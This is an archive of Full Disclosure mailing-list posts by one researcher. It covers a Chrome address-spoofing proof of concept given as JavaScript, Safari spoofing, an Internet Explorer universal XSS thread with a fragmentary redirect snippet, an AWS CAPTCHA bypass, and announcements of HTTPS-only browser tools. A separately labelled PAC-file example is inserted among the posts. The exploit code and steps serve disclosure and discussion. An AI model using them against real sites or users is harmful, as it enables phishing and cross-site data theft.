[FD] Request For Comment: Possible Flaw of Bypassing CAPTCHA in AWS Login?

2016-04-26 Thread David Leo
The AWS login process has a feature: if you use a "fresh" browser (no cookies, 
no cache, etc.) to sign in, and enter the correct email and the correct password, 
a CAPTCHA is required ("To better protect your account, please re-enter your 
password and then enter the characters as they are shown in the image below").

And I accidentally noticed that this feature can be easily bypassed:

MY SYSTEM
Knoppix 7.6.0 on Read-Only USB Stick - always "fresh" upon booting
Chromium 46 - not the latest
"US-WEST-2" EC2 Instance as proxy - always the same IP

MY STEPS

1. Use Chromium to visit https://console.aws.amazon.com/
2. Put correct email and correct password there, and sign in
3. CAPTCHA is required

4. Clear cookies, cache, etc. in Chromium
5. Use Chromium under "Lock Browser" (lockbrowser.com) with 
"txt/https-whitelist.txt" configured as follows:
--
amazon.com
d3rrzw75sdtfe5.cloudfront.net
d3a94n0r6dqtjm.cloudfront.net
d2q66yyjeovezo.cloudfront.net
d3rn69q7afuxu6.cloudfront.net
d257l1zb7u5fh9.cloudfront.net
--
6. Visit https://console.aws.amazon.com/ ... it should be an ugly page because 
CSS etc. fails to load.
7. Put correct email and correct password there, and sign in
8. CAPTCHA is NOT required

ABOUT
I noticed this weird thing because I'm super lazy - I don't add domains to the 
whitelist if it works. Later, I thought, "oops, the CAPTCHA is gone". Of course, I 
contacted Amazon, and they said it's not a bug.

REQUEST FOR COMMENT
1. Can you reproduce this?
2. Is this thing a bug or not?

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Lock Browser 5.3 (Browser Security, Open Source, Python)

2016-04-20 Thread David Leo
SUMMARY
This open source tool strictly controls what the web browser can access, which 
stops the web browser from loading harmful content - phishing, non-secure HTTP, or 
whatever is not in your whitelist.

SITUATION
"Security flaws in Google Chrome, Microsoft Edge, and Apple Safari were all 
successfully exploited... browsers as well as Windows, OS X, and Flash"
http://venturebeat.com/2016/03/18/pwn2own-2016-chrome-edge-and-safari-hacked-460k-awarded-in-total/

ATTACK
Attacks have to make the target's browser load the attacker's website, which has two 
scenarios - send the link (phishing), or control a website that the target will 
visit. The latter is difficult because web servers are usually (not always) much 
more secure than web browsers, and attackers simply don't know which websites. 
The former, phishing, is "mainstream", because it's a lot easier: the address 
of the email sender can be faked, the content of the email can look 100% legitimate and 
compelling, and the URL can hide behind a redirection service ("dereferer" of the 
email system, t.co, or whatever).

SOLUTION
Whitelist - for example, the whitelist contains Gmail, PayPal, Chase, GitHub, 
and Twitter. The attacker's website is not in the whitelist, so the harmful content 
does not reach the browser, even if some users are "stupid enough" to click links 
from The Phishing Guy.

URLs
Project Home Page: https://www.lockbrowser.com/
Source Code: https://www.lockbrowser.com/source/

HISTORY
It's a fork of HTTPS Only, released in March:
http://seclists.org/fulldisclosure/2016/Mar/77
And this is likely the last version - because the source code is so short and 
simple, maybe there is really no bug here! Let me hope so.

Kind Regards,




[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)

2016-03-23 Thread David Leo
To secure the browser, which is very fragile, the approach of HTTPS Only 3.1 is 
exceptionally simple:
1. Only HTTPS URLs (no other protocols)
2. Whitelist of domains (anything outside the whitelist is blocked)

Now, let's look at threats:
1. Man in the middle - it's fixed.
2. Phishing always requires the browser to load the attacker's website, so it's 
permanently dead here.
3. Drive-by Download - dead (if applied strictly, unable to download the 
executable)
4. Clickjacking - dead (the attacker's web page is unreachable)
5. Address Spoofing - dead too (just unable to load the fake content)
6. XSS - almost dead (for the attacker, the XSS vulnerability has to be GET, because 
POST requires the attacker's HTML)
7. CSRF - almost dead (for the attacker, the CSRF vulnerability has to be GET, and 
modern web applications simply don't do important things in GET, because it can 
be bookmarked etc., too dangerous)

URLs:
Project Home Page: https://www.httpsonly.net/
View Source Code: https://www.httpsonly.net/source/

Kind Regards,




[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)

2016-03-03 Thread David Leo
When we browse the web, top threats are:
1. Remote code execution - everything is lost
2. Man in the middle - sniffing, and tampering
3. Phishing - simple, old, and still quite useful
4. Cross site scripting - data of the vulnerable domain is lost
5. CSRF - unauthorized action

So, what if the browser can only access HTTPS on whitelisted domains? With HTTPS, 
"man in the middle" is fixed. And with the whitelist, other attacks become very 
difficult, some even become impossible (such as phishing). Phishing is a huge 
headache in this era, because URLs can be hidden in legitimate redirection (such 
as t.co).

That's why we made this simple tool (really simple - less than 200 lines of 
Python and JavaScript):
Project Home Page - https://www.httpsonly.net/
Source Code - https://github.com/httpsonly/httpsonly

Kind Regards,




[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)

2016-02-16 Thread David Leo
(@moderators The original post was too brief. This one has details.)

Summary

This tool completely locks the browser - just HTTPS, nothing else. This
tool is extremely simple - less than 100 lines of code (Python and
JavaScript).

Why

Firefox Add-on Firesheep Brings Hacking to the Masses
http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html
"Firesheep is basically a packet sniffer that can analyze all the
unencrypted Web traffic"
(Quite a while ago, it became a "casual game")

Yes, Mozilla said, "Gradually phasing out access to browser features
for non-secure websites", in April 2015. After more than six months,
they have done nothing useful.

The Chrome team wanted the same stuff:
https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
Again, nothing significant has been achieved yet.

And there is HTTPS Everywhere, with SO MANY rules:
https://www.eff.org/https-everywhere/atlas/
It can still access HTTP by default, but there is "Block all
HTTP requests". The problem: nothing happens when the browser tries HTTP -
there should be a warning (it's incorrect behavior) and options (try
HTTPS, Google Cache, etc). People complained, months ago:
https://github.com/EFForg/https-everywhere/issues/1329

How

PAC (Proxy auto-config) is used:
If it's HTTPS, that's fine.
If it's HTTP, the user gets a warning and options (try HTTPS, Google Cache -
it has HTTPS, etc).
Anything else goes to 0.0.0.0

It's a simple tool that does one job, and does it very well.

URLs

https://httpsonly.github.io/
https://github.com/httpsonly/httpsonly

Best Wishes,

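A PAC file that enforces the policy these posts describe (HTTPS only, plus the domain whitelist of HTTPS Only 3.1 and Lock Browser), written here as an added example rather than the project's own source. The whitelist contents, the local warning-proxy address 127.0.0.1:8080, the "#" comment syntax in the whitelist text and the helper names are assumptions.

```javascript
// Added example, not HTTPS Only / Lock Browser code: a PAC (proxy auto-config)
// file for "HTTPS only, whitelisted domains only". A PAC file is plain
// JavaScript; the browser calls FindProxyForURL(url, host) for every request
// and routes it by the returned string. Written in ES5 on purpose: the
// WinHTTP/JScript PAC engine does not accept let/const or arrow functions.

// Constructed sample in the one-domain-per-line format of
// txt/https-whitelist.txt (blank lines and "#" comments are an assumption).
var WHITELIST_TEXT =
  "# constructed sample whitelist\n" +
  "mail.google.com\n" +
  "paypal.com\n" +
  "\n" +
  "github.com\n";

// Assumed local proxy that answers every request with the warning page
// ("try HTTPS", "Google Cache", ...) instead of fetching plain HTTP.
var WARNING_PROXY = "PROXY 127.0.0.1:8080";
// Unreachable address: the connection simply fails ("goes to 0.0.0.0").
var BLACKHOLE = "PROXY 0.0.0.0:1";

function parseWhitelist(text) {
  var out = [];
  var lines = text.split("\n");
  for (var i = 0; i < lines.length; i++) {
    var line = lines[i].replace(/^\s+|\s+$/g, "").toLowerCase();
    if (line && line.charAt(0) !== "#") out.push(line);
  }
  return out;
}

var WHITELIST = parseWhitelist(WHITELIST_TEXT);

// Label-boundary match: "api.github.com" and "github.com" are allowed,
// "notgithub.com" and "github.com.evil.example" are not. The PAC built-in
// dnsDomainIs() is a bare suffix test and would accept "notgithub.com"
// unless the pattern carries a leading dot, so this helper is used instead.
function hostAllowed(host, whitelist) {
  var list = whitelist || WHITELIST;
  var h = host.toLowerCase().replace(/\.$/, ""); // normalise "example.com."
  for (var i = 0; i < list.length; i++) {
    var d = list[i];
    if (h === d) return true;
    var suffix = "." + d;
    if (h.length > suffix.length && h.slice(-suffix.length) === suffix) {
      return true;
    }
  }
  return false;
}

function FindProxyForURL(url, host) {
  var colon = url.indexOf(":");
  var scheme = colon < 0 ? "" : url.slice(0, colon).toLowerCase();
  if (scheme === "https") {
    // Browsers strip the path from https URLs before calling the PAC, so
    // only scheme, host and port are visible here; decide on host alone.
    return hostAllowed(host) ? "DIRECT" : BLACKHOLE;
  }
  if (scheme === "http") {
    // Plain HTTP is never loaded, even for whitelisted domains: the warning
    // proxy receives the request and can offer the HTTPS version instead.
    return WARNING_PROXY;
  }
  return BLACKHOLE; // ftp:, ws:, and anything else
}
```

Serve the file as a PAC URL or use it as the browser's automatic proxy configuration; the warning proxy itself is a separate small HTTP server.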


[FD] Open source tool for applying Google Chrome security updates

2015-08-12 Thread David Leo

The Problem
If you are a network administrator, keeping the browser updated is the first thing 
to do for security. Chrome is a very good browser, but it's a little bit 
complicated to answer this simple question: what is the version of the latest 
stable Chrome? And for people in places such as China (no Google services), 
updating Chrome is not an easy task.

The Solution
The official blog of Chrome Releases contains a lot of information. The code of 
this project extracts the version number from the official blog, downloads 
offline installers from the official website if it's a new version, and checks 
whether the visitor's Chrome is exactly the same.

Security
The best part of this project - users do not need to download and run software 
to be checked. This project does not even contain JavaScript.

URLs
Source Code https://github.com/windowschrome
Home Page http://www.windowschrome.com/
Latest Stable Chrome http://www.windowschrome.com/data/version.txt




[FD] Google Chrome Address Spoofing - Google's Opinion

2015-07-07 Thread David Leo

It's public now:
https://code.google.com/p/chromium/issues/detail?id=497588

Interesting Points:

They did reproduce
"I can reproduce this locally"

They say it's DoS
"seems like any renderer denial-of-service"
(The browser does not crash!)

They say it's not security issue
"remove security flags from this bug"

Finally, they stopped replying
"Jun 10" to "Jul 2"
(unbelievably huge delay)

In the end, they get it
"Lots of phishing attacks these days tell you to call a phone number"
"No interactions"

Currently, it's "Severity-Medium".

Kind Regards,

PS
http://dieyu.org/
Updated!




Re: [FD] Google Chrome Address Spoofing (Request For Comment)

2015-07-01 Thread David Leo

http://seclists.org/fulldisclosure/2015/Jun/109
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!

http://seclists.org/oss-sec/2015/q3/0
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!

http://seclists.org/oss-sec/2015/q2/824
Daniel Micay said:
"It does display a window with the oracle.com address"
"why you've got an ever increasing number of setTimeout events"
http://seclists.org/oss-sec/2015/q2/823
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" calls does NOT need to increase forever.
OK, I admit - we are lazy (it works and we don't touch it anymore)
:-)

http://seclists.org/oss-sec/2015/q3/2
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png
And Chrome
http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png
(A number is displayed in Chrome's address bar,
not the same as Opera)

http://seclists.org/oss-sec/2015/q2/826
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
http://seclists.org/oss-sec/2015/q3/4
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.

http://seclists.org/oss-sec/2015/q3/5
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
https://en.wikipedia.org/wiki/Main_Page
It works.
In fact, it works BETTER against HTTPS,
because HTTPS is slower, so timing is easier.

http://seclists.org/oss-sec/2015/q2/825
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.

In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do
"BBB Accredited Business"
"PayPal Partner"
etc.

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/

On 2015/6/30 7:08, David Leo wrote:

Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
* index.html

function next()
{
 w.location.replace('http://www.oracle.com/index.html?'+n);n++;
 setTimeout("next();",15);
 setTimeout("next();",25);
}
function f()
{
 w=window.open("content.html","_blank","width=500 height=500");
 
i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}

Go
* content.html
This web page is NOT oracle.com
location="http://www.oracle.com/index.html";
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash (not DoS),
and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/





[FD] Google Chrome Address Spoofing (Request For Comment)

2015-06-30 Thread David Leo

Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
* index.html

function next()
{
w.location.replace('http://www.oracle.com/index.html?'+n);n++;
setTimeout("next();",15);
setTimeout("next();",25);
}
function f()
{
w=window.open("content.html","_blank","width=500 height=500");

i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}

Go
* content.html
This web page is NOT oracle.com
location="http://www.oracle.com/index.html";
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash (not DoS),
and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/




Re: [FD] Safari Address Spoofing (How We Got It)

2015-06-02 Thread David Leo

Great blog, Michal!

If you change "http://1.2.3.4/" in your Safari code to
some URL in the real world (for example, dailymail.co.uk),
your code won't work (the page of the target domain is simply loaded).

The trick here is: "keep trying to load".

Kind Regards,

__
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

On 2015/5/31 23:09, Michal Zalewski wrote:

Well... 
http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

On Thu, May 28, 2015 at 10:47 PM, David Leo  wrote:

Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.
How it works:
Just keep trying to load the web page of target domain.

How We Got It:
Safari changes address bar to new URL,
BEFORE new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,







[FD] Safari Address Spoofing (How We Got It)

2015-05-31 Thread David Leo

Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.
How it works:
Just keep trying to load the web page of target domain.

How We Got It:
Safari changes address bar to new URL,
BEFORE new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,




Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

2015-02-07 Thread David Leo

'could you share the contents of "1.php"?'
Sure:
http://www.dailymail.co.uk/robots.txt";);
?>

"I'm assuming it is a delayed re-direct to the target's domain?"
Exactly. :-)

"the cloudflare scripts"
It's been tested without them.

Kind Regards,

On 2015/2/6 2:31, Barkley, Peter wrote:

Thanks Zaakiy,

I'm able to get the hacked page on IE9 after changing the document mode from 
Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around 
having to manually switch the document mode with the appropriate DOCTYPE set in 
the exploit html page.

David, could you share the contents of "1.php"? I'm assuming it is a delayed 
re-direct to the target's domain? I am unable to reproduce the exploit locally with the 
same code (assuming my 1.php is correct), though without the cloudflare scripts.

Thanks,
Peter


Peter Barkley | Senior Security Intelligence Analyst | Security Operations 
Centre | Royal Bank of Canada



-Original Message-
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of 
Zaakiy Siddiqui
Sent: 2015, February, 04 6:46 PM
To: David Leo; Joey Fowler
Cc: fulldisclosure@seclists.org; b...@securitytracker.com; 
bugt...@securityfocus.com; cve-ass...@mitre.org
Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Hi David,

Nice one…great find!  And thanks Joey for confirming the bypass of 
HTTP-to-HTTPS restrictions.

I can confirm that this also affects Spartan Browser (Experimental enabled in 
about:flags in Internet Explorer 11).

I can also confirm that IE 10 is affected.

IE 9 appears to not be vulnerable. Screenshots below.

Regards,
Zaakiy Siddiqui


IE 11 Spartan - vulnerable (Windows 10) [two screenshots attached]

IE 10 - vulnerable (Windows 7) [screenshot attached]

IE 9 - not vulnerable (Windows 7) [screenshot attached]


From: David Leo <mailto:david@deusen.co.uk>
Sent: Wednesday, 4 February 2015 11:13 PM
To: Joey Fowler <mailto:j...@tumblr.com>
Cc: bugt...@securityfocus.com, fulldisclosure@seclists.org, 
b...@securitytracker.com, cve-ass...@mitre.org

Microsoft was notified on Oct 13, 2014.

Joey thank you very much for your words.

Kind Regards,

On 2015/2/3 4:53, Joey Fowler wrote:

Hi David,

"nice" is an understatement here.

I've done some testing with this one and, while there /are/ quirks, it most 
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers (with 
`deny` or `same-origin` values), it executes successfully. Pending the payload 
being injected, most Content Security Policies are also bypassed (by injecting 
HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find!

Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr



On Sat, Jan 31, 2015 at 9:18 AM, David Leo <mailto:david@deusen.co.uk> wrote:

 Deusen just published code and description here:
 http://www.deusen.co.uk/items/insider3show.3362009741042107/
 which demonstrates the serious security issue.

 Summary
 An Internet Explorer vulnerability is shown here:
 Content of dailymail.co.uk can be changed by external domain.

 How To Use
 1. Close the popup window("confirm" dialog) after three seconds.
 2. Click "Go".
 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

 Technical Details
 Vulnerability: Universal Cross Site Scripting(XSS)
 Impact: Same Origin Policy(SOP) is completely bypassed
 Attack: Attackers can steal anything from another domain, and inject 
anything into another domain
 Tested: Jan/29/2015 Internet Explorer 11 Windows 7

 If you like it, please reply "nice".

 Kind Regards,






[FD] Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"

2015-02-07 Thread David Leo

1.
"Spartan - vulnerable (Windows 10)"
http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png
Thanks to Zaakiy Siddiqui!

2.
http://www.dailymail.co.uk/robots.txt";);
?>
Many asked for it.

3.
It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc
Not only injecting content - also getting private info etc.

Kind Regards,




Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

2015-02-07 Thread David Leo

"is this entirely an IE flaw"
Yes.

"is it tied to the use of Cloudflare"
No.

"I tried to reproduce... was unsuccessful"
Likely, this detail is missing:
http://www.dailymail.co.uk/robots.txt";);
?>
Please tell us whether you reproduce(with the PHP code).

"am I correct... JavaScript hosted on shared domains"
In the demo, it's first injected into page without any JavaScript.
(robots.txt)

"I don't have time to to a teardown on CloudFlare.JS"
Honestly we don't even know such file exists :-)
We uploaded and took a screenshot - that's all.

"it's a very impressive exploit"
Thanks.

'make sure the label "universal" is actually justified'
It has also been tested against Yahoo etc.

"Sorry if this has already been discussed elsewhere"
Many asked - for example:
http://www.milw00rm.com/exploits/7057

Again, please tell us whether you reproduce with the PHP code.

Kind Regards,

On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote:

So here's a possibly stupid question: is this entirely an IE flaw, or is it 
tied to the use of Cloudflare by the targeted site as well as the attacking 
site?

I ask because:

1 - I tried to reproduce the attack in a number of ways without using 
CloudFlare, and was unsuccessful.
2 - Since I don't have access to a CloudFlare account, I used Burp to do a find/replace for proxied 
response headers and bodies on "www.dailymail.co.uk" and then "dailymail.co.uk" 
with a target domain which does not use Cloudflare, then accessed the Deusen demo page. The 
injection attempt failed.
3 - I then used Burp in the same way, but replaced 
"www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which *does* use 
CloudFlare, and the injection attempt succeeded.

If this is true, am I correct in thinking that while this definitely involves a 
vulnerability in IE, it also depends at least on targeting website owners who 
use JavaScript hosted on shared domains (CloudFlare, in this case), which is 
inherently riskier than hosting it all on one's own domain due to the way 
cross-domain security works in modern browsers?

I don't have time to do a teardown on CloudFlare.JS, but does this also depend 
on some sort of code vulnerability in that file?

Even if one or both of those caveats are true, it's a very impressive exploit, but I'd 
like to make sure the label "universal" is actually justified.

Sorry if this has already been discussed elsewhere. I couldn't find anything 
when I looked.

- Ben

On 2015-02-02 12:53, Joey Fowler wrote:

Hi David,

"nice" is an understatement here.

I've done some testing with this one and, while there *are* quirks, it most
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers
(with `deny` or `same-origin` values), it executes successfully. Pending
the payload being injected, most Content Security Policies are also
bypassed (by injecting HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find!

Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr



On Sat, Jan 31, 2015 at 9:18 AM, David Leo  wrote:


Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into
dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject
anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,












Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

2015-02-04 Thread David Leo

Microsoft was notified on Oct 13, 2014.

Joey thank you very much for your words.

Kind Regards,

On 2015/2/3 4:53, Joey Fowler wrote:

Hi David,

"nice" is an understatement here.

I've done some testing with this one and, while there /are/ quirks, it most 
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers (with 
`deny` or `same-origin` values), it executes successfully. Pending the payload 
being injected, most Content Security Policies are also bypassed (by injecting 
HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find!

Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr



On Sat, Jan 31, 2015 at 9:18 AM, David Leo <mailto:david@deusen.co.uk> wrote:

Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject 
anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,








[FD] Major Internet Explorer Vulnerability - NOT Patched

2015-01-31 Thread David Leo

Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window ("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into 
dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything 
into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,

